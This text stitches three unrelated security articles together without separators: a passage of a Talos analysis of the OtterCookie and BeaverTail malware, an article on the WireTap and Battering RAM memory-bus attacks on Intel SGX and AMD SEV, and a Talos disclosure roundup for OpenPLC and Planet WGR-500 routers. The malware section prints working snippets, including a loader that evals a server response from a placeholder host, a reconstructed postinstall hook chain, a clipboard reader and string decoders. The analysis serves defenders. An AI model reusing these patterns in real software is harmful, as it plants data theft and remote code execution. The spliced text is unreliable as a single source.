While Talos cannot attribute this VS Code extension to Famous Chollima with high confidence, this may indicate that the threat actor is experimenting with different delivery vectors. The extension could also be a result of experimentation from another actor, possibly even a researcher, who is not associated with Famous Chollima, as this stands out from their usual TTPs.
Figure 3. VS Code extension configuration pretends to be Mercer Onboarding Helper but contains OtterCookie code.
Other OtterCookie modules
The OtterCookie section of code starts with the definition of a JSON object that contains configuration values such as unique campaign ID and C2 server IP address. The OtterCookie portion of the code constructs additional modules from strings, which are executed as child processes. In the attack we analyzed, we observed three modules, but we also found one additional module while hunting for similar samples in our repositories and on VirusTotal.
Remote shell module
The first module is fundamental for OtterCookie and begins with the detection of the infected system platform and a virtual machine check, followed by reporting the collected user and host information to the OtterCookie C2 server.
Figure 4. The main OtterCookie module starts by profiling the machine and includes a virtual machine check.
Once the system information is submitted, the module installs the “socket.io-client” package, which is used to connect to a specific port on the OtterCookie C2 server to wait for the commands and execute them in a loop. socket.io-client first uses HTTP and then switches to WebSocket protocol to communicate with the server, which we observed listening on the TCP port 1418.
Figure 5. socket.io-client package used for communication with C2 server.
Finally, depending on the operating system, this module periodically checks the clipboard content using the commands “pbpaste” on macOS or “powershell Get-Clipboard” on Windows. It sends the clipboard content to the C2 server URL specifically used for logging OtterCookie activities at “hxxp[://]172[.]86[.]88[.]188/api/service/makelog”.
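For reference, reading the clipboard through those commands requires nothing more than spawning a child process, which is part of why this capability is so trivial for malware to include. A minimal sketch of the platform-dependent check described above; the command names come from the analysis, while everything else is illustrative:

```javascript
const { execSync } = require("child_process");

// Returns current clipboard text on macOS or Windows, as described in the analysis.
function readClipboard() {
  const cmd = process.platform === "darwin"
    ? "pbpaste"
    : "powershell -NoProfile -Command Get-Clipboard";
  return execSync(cmd, { encoding: "utf8" });
}

console.log(readClipboard());
```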
File uploading module
This module enumerates all drives and traverses the file system in order to find files to be uploaded to the OtterCookie C2 IP address at a specific port and URL (in this case, “hxxp[://]172[.]86[.]88[.]188:1476/upload”).
This module contains a list of folder and file names to be excluded from the search, and another list with target file name extensions and file name search patterns to select files to be uploaded.
Figure 6. The list of excluded folders and patterns for files uploaded to C2.
The “interesting” file list contains the following search patterns:
While not present in the campaign Talos analyzed, this module was found while looking for similar files on VirusTotal. In addition to the targeting of cryptocurrency browser extensions by the BeaverTail code, this OtterCookie module targets extensions from a list that partially overlaps with the list of cryptocurrency wallet extensions from the BeaverTail part of the payload.
Table 1. Cryptocurrency modules targeted by OtterCookie.
The cryptocurrency module targets Google Chrome and Brave browsers. If any extensions are found in any of the browser profiles, the extension files as well as the saved Login and Web data are uploaded to a C2 server URL. In the sample Talos discovered, the upload C2 URL was “hxxp[://]138[.]201[.]50[.]5:5961/upload”.
OtterCookie evolution
OtterCookie malware samples were first observed by NTT Security Holdings around November 2024, leading to a blog article published in December 2024. However, it is believed that the malware has been in use since approximately September 2024. The motivation for using the name OtterCookie seems to come from the early samples that used content of HTTP response cookies to transfer the malicious code executed by the response handler. This remote code loading functionality evolved over time to include additional functionality.
However, in April 2025, Talos started seeing additional modules included within the OtterCookie code and the usage of the C2 server, mostly for downloading a simple OtterCookie configuration and uploading stolen data.
Figure 7. OtterCookie modules evolution timeline.
OtterCookie evolved from its initial basic data-gathering capabilities to a more modular design for data theft and remote command execution. The modules are stored within OtterCookie strings and executed on the fly.
The earliest versions, corresponding to what NTT researchers refer to as v1, contain code for remote command execution (RCE) and use a socket.IO package to communicate with a C2 server. Over time, OtterCookie modules evolved by adding code to steal and upload files, with the end goal of stealing cryptocurrency wallets from a list of hardcoded browser extensions and saved browser credentials. Targeted browsers include Brave, Google Chrome, Opera and Mozilla Firefox.
The next iteration, referred to as v2, included clipboard-stealing code using the Clipboardy package to send clipboard contents to the remote server. This version also handles the loading of Javascript code from the server slightly differently. Instead of the client evaluating a returned cookie header as in v1, the server generates an error, which gets handled by the error handler on the client side. The error handler simply passes the error response data to the eval function, where it gets executed. The loader code is small and easy to miss; along with the risk of false positive detections, this may be why detection of the OtterCookie loaders on VirusTotal is not very successful.
Figure 8. C2 server generates an error but the code is still executed by OtterCookie.
Figure 9. OtterCookie loader error handler evaluates the response data.
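For defenders hunting for this loader, the pattern is essentially an HTTP request whose error handler evaluates the response body. A hedged sketch of what such code might look like; the variable names and URL are illustrative placeholders, not taken from a sample:

```javascript
const axios = require("axios");
const c2Url = "http://example.invalid/req"; // placeholder, not a real IOC

// The server deliberately responds with an error; the "error handler" is the loader.
axios.get(c2Url).catch((err) => {
  eval(err.response.data); // the entire loader body: easy to miss in code review
});
```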
The v3 variant, observed in February 2025, includes a function to send specific files (documents, image files and cryptocurrency-related files) to the C2 server. OtterCookie v4, observed since April 2025, includes a virtual environment detection code to help attackers discern logs from sandbox environments from those of actual infections, indicating a focus on evading analysis. The code also contains some anti-debugging and anti-logging functionality.
The v4 variant improves on the previous version’s code and updates the clipboard content-stealing method. It no longer uses the Clipboardy library and instead it uses standard macOS or Windows commands for retrieving clipboard content.
It is important to note that over time the difference between BeaverTail and OtterCookie became blurred and in some attacks their code was merged into a single tool.
OtterCookie v5
The campaign Talos observed in August 2025 uses the most recent version of OtterCookie, which we call v5, demonstrated by the addition of a keylogging module. The keylogging module contains code to capture screenshots, which are uploaded to the C2 server together with keyboard keystrokes.
Figure 10. Node-nvm-ssh infection path.
The initial infection vector was a modified Chessfi application hosted on Bitbucket. Chessfi is a web3-based multiplayer chess platform where players can challenge each other and bet cryptocurrency on the outcome of their matches. The choice of a cryptocurrency-related application to lure victims is consistent with previous reporting on Famous Chollima targeting.
The first sign of the attack was the user installing the source code of the application. Based on the folder name of the project, we assess with moderate confidence that the victim was approached by the threat actor through the freelance marketplace site Fiverr, which is consistent with previous reporting. While hunting for similar samples, we also discovered code repositories that were sent to victims as attachments in Discord conversations.
The infection process started with the victim running Git to clone the repository:
Figure 11. The initial infection vector.
The Development section of the application’s readme document gives instructions to developers on how to install and run the project. It states that, after cloning the repository, users should run npm install to install dependencies, which, in this campaign, also included a malicious npm package named “node-nvm-ssh”.
During the installation of dependencies, the malicious package is downloaded from the repository and installed. The npm installer parses the package.json file of the malicious package and finds instructions to run commands after the installation. This is executed by parsing the “postinstall” value of the JSON object named “scripts”. At first glance, it seems like the postinstall scripts are there to run tests, transpile TypeScript files to Javascript, and possibly run other test scripts.
Figure 13. Malicious package.json file contains the instruction that will cause the malicious code to run.
However, the package.json installation instruction “npm run skip” causes npm to call the command node test/fixtures/eval specified in the “skip” value. Because this path doesn’t name a specific file, default Node.js loading conventions will try a number of file names, one of them being index.js.
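Putting the pieces together, the lifecycle chain described above would look roughly like this in the package’s package.json. This is a reconstruction from the behavior described in this post, not the verbatim file:

```json
{
  "name": "node-nvm-ssh",
  "version": "0.0.0",
  "scripts": {
    "postinstall": "npm run skip",
    "skip": "node test/fixtures/eval"
  }
}
```

Note that installing with npm install --ignore-scripts prevents lifecycle scripts such as postinstall from running automatically, which would have broken this chain.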
The test/fixtures/eval/index.js content contains code to spawn a child process using the file “test/fixtures/eval/node_modules/file15.js”.
Figure 14. index.js spawning a child process to execute file15.js.
Eventually, file15.js loads the file test.list, which is the final payload. This somewhat complex process to reach the payload code makes it quite difficult for an unsuspecting software engineer to discover that the installation of the Chessfi application will eventually lead to execution of malicious code.
Figure 15. file15.js reads and calls eval on the content of the file test.list.
With test.list, we have finally reached the last piece of the puzzle of how the malicious code is run. The test.list file is over 100KB long and obfuscated using Obfuscator.io. Thankfully, the obfuscation in this case is not configured to make analysis very difficult, and with the help of a deobfuscator and an LLM, Talos was able to deobfuscate most of its functionality, revealing a combination of BeaverTail and OtterCookie.
Standard BeaverTail functionality
There seem to be two distinguishable parts in the code. The first is associated with BeaverTail, including enumeration of various browser profiles and extensions as well as the download of a Python distribution and Python client payload from the C2 server “23.227.202[.]244” using the common BeaverTail/InvisibleFerret TCP port 1224. The second part of the code is associated with OtterCookie.
The BeaverTail portion starts with a function that disables console logging, then moves on to loading the required modules and calling functions to steal data from a list of browser extensions, cryptocurrency wallets, and browser credentials storage.
BeaverTail has been observed since at least May 2023, and originally was a relatively small downloader component designed to be included with Node.js-based Javascript applications. BeaverTail was also used in supply chain attacks affecting packages in the NPM package repository, which was extensively covered in previous research and is outside the scope of this post.
From the beginning, BeaverTail supported Windows, Linux and macOS, taking advantage of the fact that Node.js applications can be run on different operating system platforms.
Figure 16. Early BeaverTail OS platform check.
The other major functionalities within BeaverTail are the download of InvisibleFerret Python stealer payload modules and installation of a remote access module, typically an AnyDesk client, which would allow the attacker to take over the control of the infected machine remotely. Information stealing and remote access have remained recurring BeaverTail operational techniques over time.
Soon after the initial samples were discovered in June 2023, BeaverTail started to use simple base64 encoding of strings and renaming of variables to make the detection and analysis more difficult. This also included a scheme used to encode the C2 URL as a shuffled string whose slices are base64 decoded individually and then concatenated in a correct order to generate the final URL.
Figure 17. C2 URL encoding scheme used from early BeaverTail variants until the present.
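As a hedged illustration of that scheme, decoding boils down to base64-decoding individual slices of the shuffled string and joining them in the recovered order. The slice boundaries, order, and URL below are invented for demonstration; real samples differ:

```javascript
// Toy reconstruction of the C2 URL encoding described above: the URL is split
// into pieces, each piece is base64-encoded, and the encoded slices are stored
// shuffled. Decoding reverses the process.
function decodeC2(shuffled, slices) {
  const parts = [];
  for (const [start, end, position] of slices) {
    parts[position] = Buffer.from(shuffled.slice(start, end), "base64").toString("utf8");
  }
  return parts.join("");
}

// "http://" -> aHR0cDovLw==, "example.invalid" -> ZXhhbXBsZS5pbnZhbGlk, ":1224" -> OjEyMjQ=
const shuffled = "OjEyMjQ=aHR0cDovLw==ZXhhbXBsZS5pbnZhbGlk";
console.log(decodeC2(shuffled, [[8, 20, 0], [20, 40, 1], [0, 8, 2]]));
// -> http://example.invalid:1224
```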
Although BeaverTail is typically written in Javascript, Talos has also discovered several C2 server IP addresses shared between Javascript variants and compiled C++ binary variants created with the help of the Qt framework.
Figure 18. Qt-based BeaverTail setting QThread parameters.
From its early beginnings in mid-2023 to the last quarter of 2024, BeaverTail C2 URL patterns stabilized around the most commonly used TCP ports 1224 and 1244, rather than port 3306 used by early variants. It seems that the threat actors quickly realized that most Windows installations, unlike Linux distributions and macOS, do not come with a preinstalled Python interpreter. To tackle this issue, they included code that installs a Python distribution, typically from the “/pdown” URL path, required to run the Python InvisibleFerret modules. This TTP remains in use today.
In terms of detection evasion, Famous Chollima uses several methods to obfuscate code, most frequently utilizing different configurations of the free Javascript tool Obfuscator.io, which does make analysis, and especially detection, of the malicious code more challenging.
In addition to obfuscating the Javascript code, they also regularly use various modes of XOR-based obfuscation for downloaded modules. XORed Python InvisibleFerret modules start with a unique, user-based string assignment, followed by a reversed base64-encoded string that contains the final Python module’s code, which can itself be XORed for obfuscation.
Figure 19. A typical InvisibleFerret self-decoding Python module.
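A minimal deobfuscation sketch for that scheme, assuming a single-byte XOR key; real samples vary in how the key is derived, and the input below is placeholder data:

```javascript
// Reverse the string, base64-decode it, then XOR every byte with the key.
function decodeModule(reversedB64, xorKey) {
  const b64 = [...reversedB64].reverse().join("");
  const raw = Buffer.from(b64, "base64");
  return Buffer.from(raw.map((b) => b ^ xorKey)).toString("utf8");
}

// Self-test: XOR-encode a harmless string with key 0x2a, reverse it, then decode.
const plain = Buffer.from("print('hello')").map((b) => b ^ 0x2a);
const sample = [...plain.toString("base64")].reverse().join("");
console.log(decodeModule(sample, 0x2a)); // -> print('hello')
```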
Thankfully, by using the combination of a deobfuscating tool and an LLM to rename the variables and decode base64-encoded strings, it is possible to analyze new samples with relative ease. However, the operational tempo of groups attributed to Famous Chollima is high, and detection of completely new samples and code on VirusTotal remains unreliable, allowing threat actors enough time to successfully attack some victims.
BeaverTail, OtterCookie and InvisibleFerret functional overlaps
All additional modules present in OtterCookie code correspond well to the functionality that is traditionally associated with InvisibleFerret and its Python-based modules, as well as some parts of the BeaverTail code. This move of the functionality to Javascript may allow the threat actors to remove the reliance on Python code, eliminating the requirement for installation of full Python distributions on Windows.
Table 3. Functional similarities between Famous Chollima tools.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent, and secure access to the internet, cloud services, or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort2 rules are available for this threat: 65336
The following Snort3 rules are also available to detect the threat: 301315, 65336
ClamAV detections are also available for this threat: Js.Infostealer.Ottercookie-10057842-0, Js.Malware.Ottercookie-10057860-0
IOCs
IOCs for this research can also be found at our GitHub repository here.
Modern server processors feature a trusted execution environment (TEE) for handling especially sensitive information. There are many TEE implementations, but two are most relevant to this discussion: Intel Software Guard eXtensions (SGX), and AMD Secure Encrypted Virtualization (SEV). Almost simultaneously, two separate teams of researchers — one in the U.S. and one in Europe — independently discovered very similar (though distinct) methods for exploiting these two implementations. Their goal was to gain access to encrypted data held in random access memory. The scientific papers detailing these results were published just days apart:
WireTap: Breaking Server SGX via DRAM Bus Interposition is the effort of U.S. researchers, which details a successful hack of the Intel Software Guard eXtensions (SGX) system. They achieved this by intercepting the data exchange between the processor and the DDR4 RAM module.
In Battering RAM, scientists from Belgium and the UK also successfully compromised Intel SGX, as well as AMD’s comparable security system, SEV-SNP, by manipulating the data-transfer process between the processor and the DDR4 RAM module.
Hacking a TEE
Both the technologies mentioned — Intel SGX and AMD SEV — are designed to protect data even if the system processing it is completely compromised. Therefore, the researchers began with the premise that the attacker would have complete freedom of action: full access to both the server’s software and hardware, and the confidential data they seek residing, for instance, on a virtual machine running on that server.
In that scenario, certain limitations of both Intel SGX and AMD SEV become critical. One example is the use of deterministic encryption: an algorithm where a specific sequence of input data always produces the exact same sequence of encrypted output data. Since the attacker has full access to the software, they can input arbitrary data into the TEE. If the attacker also had access to the resulting encrypted information, comparing these two data sets would allow them to calculate the private key used. This, in turn, would enable them to decrypt other data encrypted by the same mechanism.
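To make the deterministic-encryption problem concrete, here’s a toy Node.js demonstration using AES in ECB mode, a classic deterministic construction. The memory encryption in SGX and SEV is a different, hardware-level mechanism; this sketch only illustrates why “same plaintext in, same ciphertext out” enables a known-plaintext codebook attack:

```javascript
const crypto = require("crypto");

const key = crypto.randomBytes(16);
const block = Buffer.from("ATTACK AT DAWN!!"); // exactly one 16-byte block

// ECB is deterministic: identical plaintext blocks yield identical ciphertext.
function ecbEncrypt(data) {
  const cipher = crypto.createCipheriv("aes-128-ecb", key, null);
  cipher.setAutoPadding(false);
  return Buffer.concat([cipher.update(data), cipher.final()]);
}

console.log(ecbEncrypt(block).toString("hex"));
console.log(ecbEncrypt(block).toString("hex")); // identical output: a leak an attacker can exploit
```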
The challenge, however, is how to read the encrypted data. It resides in RAM, and only the processor has direct access to it. The theoretical malware only sees the original information before it gets encrypted in memory. This is the main challenge, which the researchers approached in different ways. One straightforward, head-on solution is hardware-level interception of the data being transmitted from the processor to the RAM module.
How does this work? The memory module is removed and then reinserted using an interposer, which is also connected to a specialized device: a logic analyzer. The logic analyzer intercepts the data streams traveling across all the data and address lines to the memory module. This is quite complex. A server typically has many memory modules, so the attacker must find a way to force the processor to write the target information specifically to the desired range. Next, the raw data captured by the logic analyzer must be reconstructed and analyzed.
But the problems don’t end there. Modern memory modules exchange data with the processor at tremendous speeds, performing billions of operations per second. Intercepting such a high-speed data flow requires high-end equipment. The hardware that was used to prove the feasibility of this type of attack in 2021 cost hundreds of thousands of dollars.
The features of WireTap
The U.S. researchers behind WireTap managed to slash the cost of their hack to just under a thousand dollars. Their setup for intercepting data from the DDR4 memory module looked like this:
Test system for intercepting the data exchange between the processor and the memory module
They spent half of the budget on an ancient, quarter-century-old logic analyzer, which they acquired through an online auction. The remainder covered the necessary connectors, and the interposer (the adapter into which the target memory module was inserted) was custom-soldered by the authors themselves. An obsolete setup like this could not possibly capture the data stream at its normal speed. However, the researchers made a key discovery: they could slow down the memory module’s operation. Instead of the standard DDR4 effective speeds of 1600–3200 megahertz, they managed to throttle the speed down to 1333 megahertz.
From there, the steps are… well, not really simple, but clear:
Ensure that the data from the target process was written to the hacked memory module and then intercept it, still encrypted at this stage.
Input a custom data set into Intel SGX for encryption.
Intercept the encrypted version of the known data, compare the known plaintext with the resulting ciphertext, and compute the encryption key.
Decrypt the previously captured data belonging to the target process.
In summary, the WireTap work doesn’t fundamentally change our understanding of the inherent limitations of Intel SGX. It does, however, demonstrate that the attack can be made drastically cheaper.
The features of Battering RAM
Instead of the straightforward data-interception approach, the researchers from Belgium’s KU Leuven university and their UK colleagues sought a more subtle and elegant method to access encrypted information. But before we dive into the details, let’s look at the hardware component and compare it to the American team’s work:
The memory module interposer used in Battering RAM
In place of a tangle of wires and a bulky data analyzer, this setup features a simple board designed from scratch, into which the target memory module is inserted. The board is controlled by an inexpensive Raspberry Pi Pico microcomputer. The hardware budget is negligible: just 50 euros! Moreover, unlike the WireTap attack, Battering RAM can be conducted covertly; continuous physical access to the server isn’t needed. Once the modified memory module is installed, the required data can be stolen remotely.
What exactly does this board do? The researchers discovered that by grounding just two address lines (which dictate where information is written or read) at the right moment, they could create a data mirroring situation. This causes information to be written to memory cells that the attacker can access. The interposer board acts as a pair of simple switches controlled by the Raspberry Pi microcomputer. While manipulating contacts on live hardware typically leads to a system freeze or data corruption, the researchers achieved stable operation by disconnecting and reconnecting the address lines only at the precise moments required.
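A toy software model of that aliasing effect: grounding an address line is equivalent to forcing one address bit to zero, so two addresses that differ only in that bit end up referring to the same physical cell. The bit position below is arbitrary and purely illustrative:

```javascript
// Forcing the listed address bits to zero models grounded address lines.
function effectiveAddress(addr, groundedBits) {
  let mask = ~0;
  for (const bit of groundedBits) mask &= ~(1 << bit);
  return addr & mask;
}

const victim = 0b101100;   // where the target data is written
const attacker = 0b001100; // differs only in the grounded bit
console.log(effectiveAddress(victim, [5]) === effectiveAddress(attacker, [5])); // true: same cell
```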
This method gave the authors the ability to select where their data was recorded. Crucially, this means they didn’t even need to compute the encryption key! They first captured the encrypted information from the target process. Next, they ran their own program within the same memory range and requested the TEE system to decrypt the previously captured information. This technique allowed them to hack not only Intel SGX but also AMD SEV. Furthermore, this control over data writing helped them circumvent AMD’s security extension called SEV-SNP. This extension, using Secure Nested Paging, was designed to protect the virtual machine from compromise by preventing data modification in memory. Circumventing SEV-SNP theoretically allows attackers not only to read encrypted data but also to inject malicious code into a compromised virtual machine.
The relevance of physical attacks on server infrastructure
It’s clear that while the practical application of such attacks is possible, they’re unlikely to be conducted in the wild. The value of the stolen data would need to be extremely high to justify hardware-level tampering. At least, this is the stance taken by both Intel and AMD regarding their security solutions: both chipmakers responded to the researchers by stating that physical attacks fall outside their security model. However, both the American and European research teams demonstrated that the cost of these attacks is not nearly as high as previously believed. This potentially expands the list of threat actors willing to utilize such complex vulnerabilities.
The proposed attacks do come with their own restrictions. As we already mentioned, the information theft was conducted on systems equipped with DDR4 standard memory modules. The newer DDR5 standard, finalized in 2020, has not yet been compromised, even for research purposes. This is due both to the revised architecture of the memory modules and their increased operating speeds. Nevertheless, it’s highly likely that researchers will eventually find vulnerabilities in DDR5 as well. And that’s a good thing: the declared security of TEE systems must be regularly subjected to independent audits. Otherwise, it could turn out at some point that a supposedly trusted protection system unexpectedly becomes completely useless.
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one vulnerability in the OpenPLC logic controller and four vulnerabilities in the Planet WGR-500 router.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
OpenPLC denial-of-service vulnerability
Discovered by a member of Cisco Talos.
OpenPLC is an open-source programmable logic controller intended to provide a low-cost industrial solution for automation and research.
Talos researchers found TALOS-2025-2223 (CVE-2025-53476), a denial-of-service vulnerability in the ModbusTCP server functionality of OpenPLC_v3. A specially crafted series of network connections can prevent the server from processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.
Planet WGR-500 stack-based buffer overflow, OS command injection, format string vulnerabilities
Discovered by Francesco Benvenuto of Cisco Talos.
The Planet Networking & Communication WGR-500 is an industrial router designed for Internet of Things (IoT) networks, particularly in industrial settings such as transportation, government buildings, and other public areas. Talos found four vulnerabilities in the router software.
TALOS-2025-2226 (CVE-2025-54399-CVE-2025-54402) includes multiple stack-based buffer overflow vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to stack-based buffer overflow.
TALOS-2025-2227 (CVE-2025-54403-CVE-2025-54404) includes multiple OS command injection vulnerabilities in the swctrl functionality. A specially crafted network request can lead to arbitrary command execution.
TALOS-2025-2228 (CVE-2025-48826) is a format string vulnerability in the formPingCmd functionality of Planet WGR-500. A specially crafted series of HTTP requests can lead to memory corruption.
TALOS-2025-2229 (CVE-2025-54405-CVE-2025-54406) includes multiple OS command injection vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to arbitrary command execution.